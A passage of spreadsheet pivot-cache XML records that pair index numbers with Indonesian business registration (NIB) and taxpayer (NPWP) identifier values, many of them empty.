    <x v="5039"/>
    <s v="nib"/>
    <n v="281010212384"/>
  </r>
  <r>
    <x v="5040"/>
    <s v="nib"/>
    <n v="1258001450576"/>
  </r>
  <r>
    <x v="5040"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5032"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5041"/>
    <s v="nib"/>
    <n v="1239000202578"/>
  </r>
  <r>
    <x v="5042"/>
    <s v="nib"/>
    <n v="1239000202578"/>
  </r>
  <r>
    <x v="5043"/>
    <s v="nib"/>
    <n v="220201760333"/>
  </r>
  <r>
    <x v="5044"/>
    <s v="nib"/>
    <n v="9120009743205"/>
  </r>
  <r>
    <x v="5043"/>
    <s v="npwp"/>
    <n v="742846702041000"/>
  </r>
  <r>
    <x v="4935"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4937"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5039"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5045"/>
    <s v="nib"/>
    <n v="8120116100186"/>
  </r>
  <r>
    <x v="5046"/>
    <s v="nib"/>
    <n v="9120212271522"/>
  </r>
  <r>
    <x v="5047"/>
    <s v="nib"/>
    <n v="220209341685"/>
  </r>
  <r>
    <x v="5048"/>
    <s v="nib"/>
    <n v="8120002881639"/>
  </r>
  <r>
    <x v="5049"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="5050"/>
    <s v="nib"/>
    <n v="298010161534"/>
  </r>
  <r>
    <x v="5051"/>
    <s v="nib"/>
    <n v="1221000431966"/>
  </r>
  <r>
    <x v="5044"/>
    <s v="npwp"/>
    <s v="92.229.054.9-617.000"/>
  </r>
  <r>
    <x v="4921"/>
    <s v="npwp"/>
    <s v="41.329.639.3-439.000"/>
  </r>
  <r>
    <x v="5052"/>
    <s v="nib"/>
    <n v="220107122089"/>
  </r>
  <r>
    <x v="4889"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5035"/>
    <s v="npwp"/>
    <s v="96.003.643.2-219.000"/>
  </r>
  <r>
    <x v="5053"/>
    <s v="nib"/>
    <n v="9120102580571"/>
  </r>
  <r>
    <x v="5053"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5054"/>
    <s v="nib"/>
    <n v="9120102390783"/>
  </r>
  <r>
    <x v="5055"/>
    <s v="nib"/>
    <n v="229010030969"/>
  </r>
  <r>
    <x v="5052"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5056"/>
    <s v="nib"/>
    <n v="8120002880333"/>
  </r>
  <r>
    <x v="5057"/>
    <s v="nib"/>
    <n v="8120002880333"/>
  </r>
  <r>
    <x v="5049"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5051"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5048"/>
    <s v="npwp"/>
    <n v="27287093431000"/>
  </r>
  <r>
    <x v="5058"/>
    <s v="nib"/>
    <n v="220106792219"/>
  </r>
  <r>
    <x v="5059"/>
    <s v="nib"/>
    <n v="220201122218"/>
  </r>
  <r>
    <x v="5045"/>
    <s v="npwp"/>
    <n v="169881059315000"/>
  </r>
  <r>
    <x v="5050"/>
    <s v="npwp"/>
    <n v="671885903304000"/>
  </r>
  <r>
    <x v="5047"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5060"/>
    <s v="nib"/>
    <n v="9120300200969"/>
  </r>
  <r>
    <x v="5058"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5061"/>
    <s v="nib"/>
    <n v="1296000311257"/>
  </r>
  <r>
    <x v="5062"/>
    <s v="nib"/>
    <n v="9120015062161"/>
  </r>
  <r>
    <x v="5063"/>
    <s v="nib"/>
    <n v="220007452324"/>
  </r>
  <r>
    <x v="5055"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5064"/>
    <s v="nib"/>
    <n v="8120010232657"/>
  </r>
  <r>
    <x v="5065"/>
    <s v="nib"/>
    <n v="9120203972872"/>
  </r>
  <r>
    <x v="5062"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4925"/>
    <s v="npwp"/>
    <s v="02.831.077.9-041.000"/>
  </r>
  <r>
    <x v="5054"/>
    <s v="npwp"/>
    <s v="86.831.896.5-041.000"/>
  </r>
  <r>
    <x v="5066"/>
    <s v="nib"/>
    <n v="8120001702648"/>
  </r>
  <r>
    <x v="5067"/>
    <s v="nib"/>
    <n v="28100091118"/>
  </r>
  <r>
    <x v="5068"/>
    <s v="nib"/>
    <n v="8120201820811"/>
  </r>
  <r>
    <x v="5069"/>
    <s v="nib"/>
    <n v="1203000322669"/>
  </r>
  <r>
    <x v="5070"/>
    <s v="nib"/>
    <n v="1212000311239"/>
  </r>
  <r>
    <x v="5068"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5071"/>
    <s v="nib"/>
    <n v="220002382613"/>
  </r>
  <r>
    <x v="910"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="5066"/>
    <s v="npwp"/>
    <s v="01‚Äì438‚Äì617‚Äì1‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="5072"/>
    <s v="nib"/>
    <n v="8120116132733"/>
  </r>
  <r>
    <x v="5073"/>
    <s v="nib"/>
    <n v="294010092963"/>
  </r>
  <r>
    <x v="5074"/>
    <s v="nib"/>
    <n v="9120104931536"/>
  </r>
  <r>
    <x v="5075"/>
    <s v="nib"/>
    <n v="9120002432718"/>
  </r>
  <r>
    <x v="5065"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4978"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5074"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5076"/>
    <s v="nib"/>
    <n v="9120004400456"/>
  </r>
  <r>
    <x v="5077"/>
    <s v="nib"/>
    <n v="8120002962955"/>
  </r>
  <r>
    <x v="5037"/>
    <s v="npwp"/>
    <n v="412400228804000"/>
  </r>
  <r>
    <x v="5072"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5063"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5064"/>
    <s v="npwp"/>
    <n v="30507263444000"/>
  </r>
  <r>
    <x v="5067"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5004"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5078"/>
    <s v="nib"/>
    <n v="272011012527"/>
  </r>
  <r>
    <x v="5079"/>
    <s v="nib"/>
    <n v="9120204810127"/>
  </r>
  <r>
    <x v="5070"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5080"/>
    <s v="nib"/>
    <n v="220502842882"/>
  </r>
  <r>
    <x v="5081"/>
    <s v="nib"/>
    <n v="264010152409"/>
  </r>
  <r>
    <x v="5082"/>
    <s v="nib"/>
    <n v="9120205542525"/>
  </r>
  <r>
    <x v="5083"/>
    <s v="nib"/>
    <n v="1298001421231"/>
  </r>
  <r>
    <x v="5084"/>
    <s v="nib"/>
    <n v="1298001421231"/>
  </r>
  <r>
    <x v="5085"/>
    <s v="nib"/>
    <n v="9120204532826"/>
  </r>
  <r>
    <x v="5086"/>
    <s v="nib"/>
    <n v="9120001282619"/>
  </r>
  <r>
    <x v="5069"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5087"/>
    <s v="nib"/>
    <n v="220301291287"/>
  </r>
  <r>
    <x v="5087"/>
    <s v="npwp"/>
    <s v="81.225530.5-224.000"/>
  </r>
  <r>
    <x v="5088"/>
    <s v="nib"/>
    <n v="8120004871089"/>
  </r>
  <r>
    <x v="5089"/>
    <s v="nib"/>
    <n v="220209341685"/>
  </r>
  <r>
    <x v="5090"/>
    <s v="nib"/>
    <n v="9120011153007"/>
  </r>
  <r>
    <x v="4972"/>
    <s v="npwp"/>
    <s v="41.749.134.7-225.000"/>
  </r>
  <r>
    <x v="1608"/>
    <s v="npwp"/>
    <s v="02.380.501.3-732.002"/>
  </r>
  <r>
    <x v="5091"/>
    <s v="nib"/>
    <s v="-"/>
  </r>
  <r>
    <x v="5092"/>
    <s v="nib"/>
    <n v="220005791339"/>
  </r>
  <r>
    <x v="5093"/>
    <s v="nib"/>
    <n v="286011201255"/>
  </r>
  <r>
    <x v="5094"/>
    <s v="nib"/>
    <n v="8120007870315"/>
  </r>
  <r>
    <x v="5094"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5095"/>
    <s v="nib"/>
    <n v="9120007332059"/>
  </r>
  <r>
    <x v="5095"/>
    <s v="npwp"/>
    <s v="01.071.198.4-057.000"/>
  </r>
  <r>
    <x v="5093"/>
    <s v="npwp"/>
    <s v="96.593.294.0-503.000"/>
  </r>
  <r>
    <x v="5092"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5096"/>
    <s v="nib"/>
    <n v="9120013050828"/>
  </r>
  <r>
    <x v="5090"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5097"/>
    <s v="nib"/>
    <n v="9120015012918"/>
  </r>
  <r>
    <x v="5098"/>
    <s v="nib"/>
    <n v="9120218042583"/>
  </r>
  <r>
    <x v="5099"/>
    <s v="nib"/>
    <n v="210010092664"/>
  </r>
  <r>
    <x v="5100"/>
    <s v="nib"/>
    <n v="9120004642376"/>
  </r>
  <r>
    <x v="5101"/>
    <s v="nib"/>
    <n v="9120218042583"/>
  </r>
  <r>
    <x v="5102"/>
    <s v="nib"/>
    <n v="220100292544"/>
  </r>
  <r>
    <x v="5103"/>
    <s v="nib"/>
    <n v="9120317141118"/>
  </r>
  <r>
    <x v="5104"/>
    <s v="nib"/>
    <n v="1221000310857"/>
  </r>
  <r>
    <x v="5105"/>
    <s v="nib"/>
    <n v="220200112644"/>
  </r>
  <r>
    <x v="5106"/>
    <s v="nib"/>
    <n v="220202152213"/>
  </r>
  <r>
    <x v="5088"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5107"/>
    <s v="nib"/>
    <n v="220608842259"/>
  </r>
  <r>
    <x v="5108"/>
    <s v="nib"/>
    <n v="1268003462463"/>
  </r>
  <r>
    <x v="5109"/>
    <s v="nib"/>
    <n v="9120004642376"/>
  </r>
  <r>
    <x v="5104"/>
    <s v="npwp"/>
    <n v="416624682951000"/>
  </r>
  <r>
    <x v="5110"/>
    <s v="nib"/>
    <n v="1219000443008"/>
  </r>
  <r>
    <x v="5018"/>
    <s v="npwp"/>
    <s v="Ada"/>
  </r>
  <r>
    <x v="5107"/>
    <s v="npwp"/>
    <n v="160059507951000"/>
  </r>
  <r>
    <x v="4916"/>
    <s v="npwp"/>
    <s v="75.183.767.5-105.000"/>
  </r>
  <r>
    <x v="5099"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5111"/>
    <s v="nib"/>
    <n v="9120105851193"/>
  </r>
  <r>
    <x v="5110"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5112"/>
    <s v="nib"/>
    <n v="9120206130078"/>
  </r>
  <r>
    <x v="5103"/>
    <s v="npwp"/>
    <s v="14.922.255.6-224.000"/>
  </r>
  <r>
    <x v="5113"/>
    <s v="nib"/>
    <n v="1200000220281"/>
  </r>
  <r>
    <x v="5114"/>
    <s v="nib"/>
    <n v="1245000322567"/>
  </r>
  <r>
    <x v="5108"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5060"/>
    <s v="npwp"/>
    <n v="66928946604000"/>
  </r>
  <r>
    <x v="5115"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="5077"/>
    <s v="npwp"/>
    <s v="01.686.270.8-044.000"/>
  </r>
  <r>
    <x v="5116"/>
    <s v="nib"/>
    <n v="8120108880489"/>
  </r>
  <r>
    <x v="5117"/>
    <s v="nib"/>
    <n v="9120008742341"/>
  </r>
  <r>
    <x v="5118"/>
    <s v="nib"/>
    <n v="1269000353614"/>
  </r>
  <r>
    <x v="5119"/>
    <s v="nib"/>
    <n v="1201000480395"/>
  </r>
  <r>
    <x v="5120"/>
    <s v="nib"/>
    <n v="1253000301289"/>
  </r>
  <r>
    <x v="5121"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="4890"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5097"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="315"/>
    <s v="nib"/>
    <n v="9120210230761"/>
  </r>
  <r>
    <x v="5122"/>
    <s v="nib"/>
    <n v="8120109911439"/>
  </r>
  <r>
    <x v="5028"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5116"/>
    <s v="npwp"/>
    <s v="82.591.197.7-041.000"/>
  </r>
  <r>
    <x v="5123"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="5124"/>
    <s v="nib"/>
    <n v="221010122555"/>
  </r>
  <r>
    <x v="5122"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5085"/>
    <s v="npwp"/>
    <s v="90.411.626.6-617.000"/>
  </r>
  <r>
    <x v="5125"/>
    <s v="nib"/>
    <n v="1287000111569"/>
  </r>
  <r>
    <x v="5120"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5126"/>
    <s v="nib"/>
    <n v="1248000131546"/>
  </r>
  <r>
    <x v="5127"/>
    <s v="nib"/>
    <n v="1225000520374"/>
  </r>
  <r>
    <x v="5128"/>
    <s v="nib"/>
    <n v="221010122555"/>
  </r>
  <r>
    <x v="5124"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5111"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5101"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5129"/>
    <s v="nib"/>
    <n v="9120204250619"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="221010122555"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="221010122555"/>
  </r>
  <r>
    <x v="5130"/>
    <s v="nib"/>
    <n v="9120007861397"/>
  </r>
  <r>
    <x v="5131"/>
    <s v="nib"/>
    <n v="220107412714"/>
  </r>
  <r>
    <x v="5132"/>
    <s v="nib"/>
    <n v="1261000422577"/>
  </r>
  <r>
    <x v="5133"/>
    <s v="nib"/>
    <n v="1275000412976"/>
  </r>
  <r>
    <x v="5134"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="5135"/>
    <s v="nib"/>
    <n v="220100102989"/>
  </r>
  <r>
    <x v="5136"/>
    <s v="nib"/>
    <n v="220302350791"/>
  </r>
  <r>
    <x v="5132"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5133"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5137"/>
    <s v="nib"/>
    <n v="1295000332823"/>
  </r>
  <r>
    <x v="5138"/>
    <s v="nib"/>
    <n v="1219000560089"/>
  </r>
  <r>
    <x v="5138"/>
    <s v="npwp"/>
    <s v="42.372.257.8-721.000"/>
  </r>
  <r>
    <x v="5139"/>
    <s v="nib"/>
    <n v="266000951943"/>
  </r>
  <r>
    <x v="5139"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5140"/>
    <s v="nib"/>
    <n v="9120006240484"/>
  </r>
  <r>
    <x v="5141"/>
    <s v="nib"/>
    <n v="9120008200118"/>
  </r>
  <r>
    <x v="5142"/>
    <s v="nib"/>
    <n v="219010002967"/>
  </r>
  <r>
    <x v="5143"/>
    <s v="nib"/>
    <n v="9120410211266"/>
  </r>
  <r>
    <x v="5141"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5144"/>
    <s v="nib"/>
    <n v="9120306470182"/>
  </r>
  <r>
    <x v="5096"/>
    <s v="npwp"/>
    <s v="54.112.564.7-331.000"/>
  </r>
  <r>
    <x v="5145"/>
    <s v="nib"/>
    <n v="8120312042393"/>
  </r>
  <r>
    <x v="5146"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="5146"/>
    <s v="npwp"/>
    <s v="01.517.118.4-801.001"/>
  </r>
  <r>
    <x v="5147"/>
    <s v="nib"/>
    <n v="9120215202179"/>
  </r>
  <r>
    <x v="5148"/>
    <s v="nib"/>
    <n v="9120006720094"/>
  </r>
  <r>
    <x v="5149"/>
    <s v="nib"/>
    <n v="9120204252581"/>
  </r>
  <r>
    <x v="5150"/>
    <s v="nib"/>
    <n v="9120204252581"/>
  </r>
  <r>
    <x v="5151"/>
    <s v="nib"/>
    <n v="9120306470182"/>
  </r>
  <r>
    <x v="5152"/>
    <s v="nib"/>
    <n v="207010230425"/>
  </r>
  <r>
    <x v="5142"/>
    <s v="npwp"/>
    <s v="96.258.208.6-619.000"/>
  </r>
  <r>
    <x v="5153"/>
    <s v="nib"/>
    <n v="223000903306"/>
  </r>
  <r>
    <x v="5154"/>
    <s v="nib"/>
    <n v="9120210003002"/>
  </r>
  <r>
    <x v="5155"/>
    <s v="nib"/>
    <n v="9120218291793"/>
  </r>
  <r>
    <x v="4438"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5156"/>
    <s v="nib"/>
    <n v="9120006761426"/>
  </r>
  <r>
    <x v="5157"/>
    <s v="nib"/>
    <n v="9120217122274"/>
  </r>
  <r>
    <x v="4904"/>
    <s v="npwp"/>
    <s v="09.705.477.9-122.000"/>
  </r>
  <r>
    <x v="5158"/>
    <s v="nib"/>
    <n v="1254000501296"/>
  </r>
  <r>
    <x v="5158"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5159"/>
    <s v="nib"/>
    <n v="8120115232709"/>
  </r>
  <r>
    <x v="5160"/>
    <s v="nib"/>
    <n v="220005310737"/>
  </r>
  <r>
    <x v="944"/>
    <s v="nib"/>
    <n v="220008731966"/>
  </r>
  <r>
    <x v="5161"/>
    <s v="nib"/>
    <n v="1233000410999"/>
  </r>
  <r>
    <x v="5162"/>
    <s v="nib"/>
    <n v="289010103405"/>
  </r>
  <r>
    <x v="5163"/>
    <s v="nib"/>
    <n v="275010001459"/>
  </r>
  <r>
    <x v="5164"/>
    <s v="nib"/>
    <n v="1203000552114"/>
  </r>
  <r>
    <x v="5165"/>
    <s v="nib"/>
    <n v="220107510869"/>
  </r>
  <r>
    <x v="5166"/>
    <s v="nib"/>
    <n v="1292000511481"/>
  </r>
  <r>
    <x v="5167"/>
    <s v="nib"/>
    <n v="9120006761426"/>
  </r>
  <r>
    <x v="5168"/>
    <s v="nib"/>
    <n v="220208722871"/>
  </r>
  <r>
    <x v="4234"/>
    <s v="npwp"/>
    <s v="03.137.709.6-922.000"/>
  </r>
  <r>
    <x v="5169"/>
    <s v="nib"/>
    <n v="1203000542247"/>
  </r>
  <r>
    <x v="5170"/>
    <s v="nib"/>
    <n v="1291000552441"/>
  </r>
  <r>
    <x v="5170"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5171"/>
    <s v="nib"/>
    <n v="1265000480093"/>
  </r>
  <r>
    <x v="5140"/>
    <s v="npwp"/>
    <s v="016420275-941000"/>
  </r>
  <r>
    <x v="5169"/>
    <s v="npwp"/>
    <s v="72.016.871.5-421.000"/>
  </r>
  <r>
    <x v="5172"/>
    <s v="nib"/>
    <n v="9120208941671"/>
  </r>
  <r>
    <x v="5172"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5173"/>
    <s v="nib"/>
    <n v="9120306911924"/>
  </r>
  <r>
    <x v="5174"/>
    <s v="nib"/>
    <n v="9120006430395"/>
  </r>
  <r>
    <x v="5175"/>
    <s v="nib"/>
    <n v="9120306911924"/>
  </r>
  <r>
    <x v="5151"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5176"/>
    <s v="nib"/>
    <n v="9120200961099"/>
  </r>
  <r>
    <x v="5177"/>
    <s v="nib"/>
    <s v="USAHA IKAN RUSDI"/>
  </r>
  <r>
    <x v="5178"/>
    <s v="nib"/>
    <n v="1295000502225"/>
  </r>
  <r>
    <x v="5179"/>
    <s v="nib"/>
    <n v="1265000521673"/>
  </r>
  <r>
    <x v="5042"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5143"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5130"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5163"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5180"/>
    <s v="nib"/>
    <n v="8120115261772"/>
  </r>
  <r>
    <x v="5181"/>
    <s v="nib"/>
    <n v="9120215021742"/>
  </r>
  <r>
    <x v="5178"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5182"/>
    <s v="nib"/>
    <n v="9120217250921"/>
  </r>
  <r>
    <x v="5183"/>
    <s v="nib"/>
    <n v="9120009712144"/>
  </r>
  <r>
    <x v="5183"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5184"/>
    <s v="nib"/>
    <n v="1230000453103"/>
  </r>
  <r>
    <x v="5185"/>
    <s v="nib"/>
    <n v="1254000122666"/>
  </r>
  <r>
    <x v="5186"/>
    <s v="nib"/>
    <n v="231000951841"/>
  </r>
  <r>
    <x v="5187"/>
    <s v="nib"/>
    <n v="1283000492142"/>
  </r>
  <r>
    <x v="5188"/>
    <s v="nib"/>
    <n v="9120309471827"/>
  </r>
  <r>
    <x v="4607"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5189"/>
    <s v="nib"/>
    <n v="220000172786"/>
  </r>
  <r>
    <x v="5171"/>
    <s v="npwp"/>
    <s v="41.961.625.5-617.000"/>
  </r>
  <r>
    <x v="5190"/>
    <s v="nib"/>
    <n v="8120017271423"/>
  </r>
  <r>
    <x v="5182"/>
    <s v="npwp"/>
    <s v="26.849.405.1-615.000"/>
  </r>
  <r>
    <x v="5191"/>
    <s v="nib"/>
    <n v="1289001402873"/>
  </r>
  <r>
    <x v="5190"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5176"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5185"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5152"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5192"/>
    <s v="nib"/>
    <n v="1210000131553"/>
  </r>
  <r>
    <x v="5193"/>
    <s v="nib"/>
    <n v="1297001411745"/>
  </r>
  <r>
    <x v="5179"/>
    <s v="npwp"/>
    <n v="423882778912000"/>
  </r>
  <r>
    <x v="5159"/>
    <s v="npwp"/>
    <n v="314084286421000"/>
  </r>
  <r>
    <x v="5187"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5194"/>
    <s v="nib"/>
    <n v="9120208111204"/>
  </r>
  <r>
    <x v="5195"/>
    <s v="nib"/>
    <n v="9120208111204"/>
  </r>
  <r>
    <x v="5186"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5196"/>
    <s v="nib"/>
    <n v="220207833511"/>
  </r>
  <r>
    <x v="5192"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5109"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5197"/>
    <s v="nib"/>
    <n v="220003141052"/>
  </r>
  <r>
    <x v="5161"/>
    <s v="npwp"/>
    <s v="ada"/>
  </r>
  <r>
    <x v="5162"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5198"/>
    <s v="nib"/>
    <n v="9120107153219"/>
  </r>
  <r>
    <x v="5199"/>
    <s v="nib"/>
    <n v="9120316110146"/>
  </r>
  <r>
    <x v="5199"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5196"/>
    <s v="npwp"/>
    <s v="Ada"/>
  </r>
  <r>
    <x v="5200"/>
    <s v="nib"/>
    <n v="220003392716"/>
  </r>
  <r>
    <x v="5200"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5201"/>
    <s v="nib"/>
    <n v="9120010100659"/>
  </r>
  <r>
    <x v="5201"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5202"/>
    <s v="nib"/>
    <n v="9120206130078"/>
  </r>
  <r>
    <x v="5203"/>
    <s v="nib"/>
    <n v="9120206130078"/>
  </r>
  <r>
    <x v="5204"/>
    <s v="nib"/>
    <n v="1287000502103"/>
  </r>
  <r>
    <x v="5205"/>
    <s v="nib"/>
    <n v="1287000502103"/>
  </r>
  <r>
    <x v="5206"/>
    <s v="nib"/>
    <n v="1287000502103"/>
  </r>
  <r>
    <x v="5207"/>
    <s v="nib"/>
    <n v="1287000502103"/>
  </r>
  <r>
    <x v="5208"/>
    <s v="nib"/>
    <n v="1287000502103"/>
  </r>
  <r>
    <x v="5209"/>
    <s v="nib"/>
    <n v="1276000533713"/>
  </r>
  <r>
    <x v="5210"/>
    <s v="nib"/>
    <n v="9120210003002"/>
  </r>
  <r>
    <x v="5210"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5211"/>
    <s v="nib"/>
    <n v="1279000550932"/>
  </r>
  <r>
    <x v="567"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="5193"/>
    <s v="npwp"/>
    <s v="41.968.542.5-617.000"/>
  </r>
  <r>
    <x v="5119"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5212"/>
    <s v="nib"/>
    <n v="8120007910152"/>
  </r>
  <r>
    <x v="5213"/>
    <s v="nib"/>
    <n v="8120005703115"/>
  </r>
  <r>
    <x v="5214"/>
    <s v="nib"/>
    <n v="294010001203"/>
  </r>
  <r>
    <x v="5215"/>
    <s v="nib"/>
    <n v="1279000600643"/>
  </r>
  <r>
    <x v="5215"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5198"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5216"/>
    <s v="nib"/>
    <n v="1292000502751"/>
  </r>
  <r>
    <x v="5216"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5147"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5217"/>
    <s v="nib"/>
    <n v="8120312042393"/>
  </r>
  <r>
    <x v="5218"/>
    <s v="nib"/>
    <n v="220006661966"/>
  </r>
  <r>
    <x v="5218"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5219"/>
    <s v="nib"/>
    <n v="220302771541"/>
  </r>
  <r>
    <x v="5220"/>
    <s v="nib"/>
    <n v="9120119192216"/>
  </r>
  <r>
    <x v="5220"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5221"/>
    <s v="nib"/>
    <n v="8120316002347"/>
  </r>
  <r>
    <x v="5213"/>
    <s v="npwp"/>
    <s v="31.489.833.9-418.000"/>
  </r>
  <r>
    <x v="5175"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5222"/>
    <s v="nib"/>
    <n v="9120405781806"/>
  </r>
  <r>
    <x v="5189"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5222"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5164"/>
    <s v="npwp"/>
    <n v="702190729041000"/>
  </r>
  <r>
    <x v="5223"/>
    <s v="nib"/>
    <n v="9120014101837"/>
  </r>
  <r>
    <x v="5224"/>
    <s v="nib"/>
    <n v="8120200872086"/>
  </r>
  <r>
    <x v="5225"/>
    <s v="nib"/>
    <n v="1237000521999"/>
  </r>
  <r>
    <x v="340"/>
    <s v="nib"/>
    <n v="9120001382442"/>
  </r>
  <r>
    <x v="5226"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="5226"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5227"/>
    <s v="nib"/>
    <n v="1227000541605"/>
  </r>
  <r>
    <x v="5219"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5214"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5223"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5228"/>
    <s v="nib"/>
    <n v="284010142054"/>
  </r>
  <r>
    <x v="5229"/>
    <s v="nib"/>
    <n v="225000951642"/>
  </r>
  <r>
    <x v="5230"/>
    <s v="nib"/>
    <n v="9120001382442"/>
  </r>
  <r>
    <x v="5224"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5123"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5231"/>
    <s v="nib"/>
    <n v="9120006242328"/>
  </r>
  <r>
    <x v="5225"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5137"/>
    <s v="npwp"/>
    <n v="421414343224000"/>
  </r>
  <r>
    <x v="5232"/>
    <s v="nib"/>
    <n v="213000932524"/>
  </r>
  <r>
    <x v="5233"/>
    <s v="nib"/>
    <n v="1241000610899"/>
  </r>
  <r>
    <x v="5231"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5234"/>
    <s v="nib"/>
    <n v="9120305963006"/>
  </r>
  <r>
    <x v="5235"/>
    <s v="nib"/>
    <n v="9120405131782"/>
  </r>
  <r>
    <x v="5236"/>
    <s v="nib"/>
    <n v="8120001891402"/>
  </r>
  <r>
    <x v="5237"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
